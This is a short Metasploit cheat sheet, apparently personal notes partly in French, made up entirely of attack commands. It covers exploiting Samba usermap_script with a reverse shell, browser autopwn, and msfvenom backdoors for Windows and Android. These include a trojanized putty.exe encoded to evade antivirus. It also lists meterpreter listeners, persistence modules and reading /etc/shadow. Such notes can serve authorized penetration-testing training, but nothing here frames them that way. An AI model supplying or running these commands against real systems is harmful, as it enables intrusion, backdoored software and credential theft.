---- Exploit (msfconsole) -------------------- nmap -sV 10.0.0.5 db_nmap -sV 10.0.0.5 search vsftpd 2.3.4 info exploit/multi/samba/usermap_script use exploit/multi/samba/usermap_script show options set RHOST 10.0.0.5 show payloads set PAYLOAD cmd/unix/reverse show options set LHOST 10.0.0.3 exploit ---------------------------------------------- ---- Commandes utiles (terminal) ------------- shell (dans meterpreter) hostname uname whoami sysinfo cat /etc/shadow ---------------------------------------------- ---- Browser auto_pwn (msfconsole) ----------- use auxiliary/server/browser_autopwn show options set LHOST set URIPATH hacking run ---------------------------------------------- ---- Create backdoors (msfvenom) ------------- msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 -b "\x00" -f exe -o backdoor_only.exe msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=3232 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o putty_mod.exe Android : msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=8888 R> /root/Bureau/test.apk ---------------------------------------------- ---- Listeners for backdoors (msfconsole) ---- use exploit/multi/handler Windows : set payload windows/meterpreter/reverse_tcp Android : set payload android/meterpreter/reverse_tcp show options set LHOST 10.0.0.5 set LPORT 3232 exploit ---------------------------------------------- ---- Module de persistance (meterpreter) ----- run metsvc run post/windows/manage/persistance_exe ---------------------------------------------- ---- Outils GUI & Framewoks -------------- nmap msfconsole msfvenom admitage Veil-Evasion -> Creer des payloads ----------------------------------------------